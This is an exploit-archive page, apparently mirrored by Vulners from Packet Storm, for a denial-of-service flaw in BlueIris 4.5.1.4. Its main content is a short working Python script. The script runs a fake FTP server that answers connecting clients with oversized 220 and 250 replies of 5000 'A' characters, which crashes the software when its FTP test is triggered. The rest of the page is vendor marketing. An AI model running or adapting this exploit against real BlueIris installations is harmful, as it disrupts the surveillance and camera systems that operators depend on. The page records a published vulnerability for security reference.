Lucene search
K

BlueIris 4.5.1.4 Denial Of Service

🗓️ 01 Mar 2017 00:00:00Reported by Peter BarisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

BlueIris 4.5.1.4 Denial Of Service exploit on Windows Server 2008 R2 Standard x6

Code
`import socket  
  
  
# Title: BlueIris - Denial of Service  
# Date: 2017-02-28  
# Exploit Author: Peter Baris  
# Vendor Homepage: http://www.saptech-erp.com.au  
# Software Link: http://blueirissoftware.com/blueiris.exe  
# Version: 4.5.1.4  
# Tested on: Windows Server 2008 R2 Standard x64  
  
  
# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.  
  
buffer = "A"*5000  
port = 21  
s = socket.socket()  
ip = '0.0.0.0'   
s.bind((ip, port))   
s.listen(5)   
  
  
print 'Listening on FTP port: '+str(port)  
  
while True:  
conn, addr = s.accept()   
conn.send('220 '+buffer+'\r\n')  
conn.recv(1024)  
conn.send('250 '+buffer+'\r\n')  
conn.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Mar 2017 00:00Current
7.4High risk
Vulners AI Score7.4
28